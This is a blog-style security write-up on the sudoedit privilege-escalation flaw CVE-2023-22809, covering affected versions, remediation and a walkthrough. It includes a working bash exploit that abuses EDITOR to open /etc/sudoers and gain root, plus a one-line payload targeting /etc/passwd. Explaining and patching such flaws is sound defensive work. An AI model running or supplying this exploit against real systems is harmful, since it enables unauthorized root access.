Sudo vulnerability in Linux lead to Privilege Escalation (CVE-2023–22809)

Hamza Khattak
6 min readJun 13, 2023

--

Introduction

Local Privilege Escalation Vulnerability has been found in Debian Linux sudo version 1.9.12 and below and registered as CVE-2023–22809.

Description

Debian Linux is a highly regarded distribution for its stability and security features. To grant administrative privileges to users, Debian uses the “sudo” command, which stands for “Superuser Do.” The root account is disabled in Debian by default, so the “sudo” command is required for administrative tasks. To use “sudo,” the user must belong to the “sudo” group. To add a user to the “sudo” group, one can use the command.

 usermod -aG sudo username

The sudoedit command is a Linux command used to edit files with elevated privileges. It is similar to the sudo command, which allows users to execute commands with elevated privileges, but sudoedit is specifically designed for editing files.

The Vulnerability

Recently in January 2023, A flaw was detected in the sudo utility whereby the manner in which sudoedit processes environment variables supplied by the user creates an opportunity for unrestricted file writing with the permissions of the RunAs user (typically root). The condition for this vulnerability to be exploited is that the user currently authorized by the sudoers policy to modify a file using sudoedit.

The End Game

With this vulnerability, attackers can leverage the sudoedit feature to gain access to arbitrary files and modify them, allowing them to execute malicious code, steal sensitive information, and even take full control of the targeted system. This vulnerability can be exploited by attackers who already have access to the system, or those who have gained access through other means, such as phishing attacks, malware, or other exploits.

Component Name

Debian Linux

Affected Versions

From (including): 1.8.0

Up to (excluding): 1.9.12

Vulnerability Type

Privilege Escalation

Summary

The Sudo feature known as sudoedit (also referred to as -e) in versions prior to 1.9.12p2, does not handle additional arguments provided through user-defined environment variables (SUDO_EDITOR, VISUAL, and EDITOR) appropriately. Consequently, a local attacker can add arbitrary entries to the file list, resulting in a possible privilege escalation. Versions 1.8.0 through 1.9.12.p1 are affected. The root cause is that the protection mechanism can be circumvented by a user-defined editor that includes a “ — “ argument, such as an EDITOR=’nano — /path/to/extra/file’ value.

If a user-defined editor is set to include a “ — “ argument, for instance, it can bypass the protection mechanism.

Example: EDITOR='nano -- /etc/passwd' sudoedit /etc/motd

Remediation Solutions

Solution 1

It is possible to prevent a user-specified editor from being used by sudoedit by adding the following line to the sudoers file.

Defaults!sudoedit    env_delete+="SUDO_EDITOR VISUAL EDITOR"

To restrict the editor when editing specific files, a Cmnd Alias can be used, for example:

Cmnd_Alias              EDIT_MOTD = sudoedit /etc/motd
Defaults!EDIT_MOTD env_delete+="SUDO_EDITOR VISUAL EDITOR"
user ALL = EDIT_MOTD

Solution 2

update the affected package as soon as possible.

Command:  sudo apt update; sudo apt --only-upgrade install sudo

Technical Analysis

Enumeration

Before trying to exploit we have to check that if our system is vulnerable to this vulnerability or not. So, to check that we can use the following command

Version 1.9.11p3 is vulnerable.

I have use automated script to check if system is vulnerable or not.

code:

#!/bin/bash
if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'
then
echo "> Currently installed sudo version is not vulnerable"
exit 1
else
echo "> Currently installed sudo version is vulnerable"
fi

Exploitation

We can exploit this vulnerability using a bash script as given following.

if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'
then
echo "> Currently installed sudo version is not vulnerable"
exit 1
fi

EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)

if [ -z "$EXPLOITABLE" ]; then
echo "> It doesn't seem that this user can run sudoedit as root"
read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
else
echo "> BINGO! User exploitable"
fi

echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
echo "$USER ALL=(ALL:ALL) ALL"
read -n 1 -s -r -p "Press any key to continue..."
EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
sudo su root
exit 0

What this code is Doing?

This Bash script first checks if the current version of sudo installed on the system is vulnerable, and if so, attempts to exploit a privilege escalation vulnerability in the sudo configuration.

The first part of the script checks the version of sudo using the command “sudo — version”, and if it matches a regular expression indicating a vulnerable version, the script exits with an error message. Otherwise, the script continues to the next step.

The second part of the script checks if the current user has permissions to run “sudoedit” or “sudo -e” commands with root privileges, which can potentially be used to escalate privileges. If the user does not have these permissions, the script asks for confirmation to proceed anyway. If the user is exploitable, the script proceeds to the next step.

The third part of the script displays a message instructing the user to add a line to the sudoers file, which allows the current user to run any command with root privileges. The user is prompted to press a key to continue, and then the script attempts to open the sudoers file using the user’s preferred editor, specified in the $EDITOR environment variable, with the privileges obtained in the previous step. Finally, the script attempts to switch to the root user using “sudo su root”.

Exploitation

By checking the sudo permissions, we don not have any kind of permissions to run sudo command

sudo su

But user can run sudoedit command on /etc/motd. The motd file is a simple text file that is displayed to users when they log in to the system. It can contain important system information or customized messages for users.

sudo -l

Now we can run our exploit script that is explained above to elevate our privileges.

Upon executing the script we can see that we are given to add the test ALL=(ALL:ALL) ALL to sudoers file.

By entering any button, script opens the sudoers file in vim. We can see that only root have ALL permissions.

root    ALL=(ALL:ALL) ALL

Now we added the following code to the privilege section.

And saved it with :wq

Hence we are in the root shell.

Reference:

Exploit: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc

CVE Details: https://access.redhat.com/security/cve/CVE-2023-22809

--

--

Hamza Khattak

Security Researcher | Vulnerability Assessment | Exploitation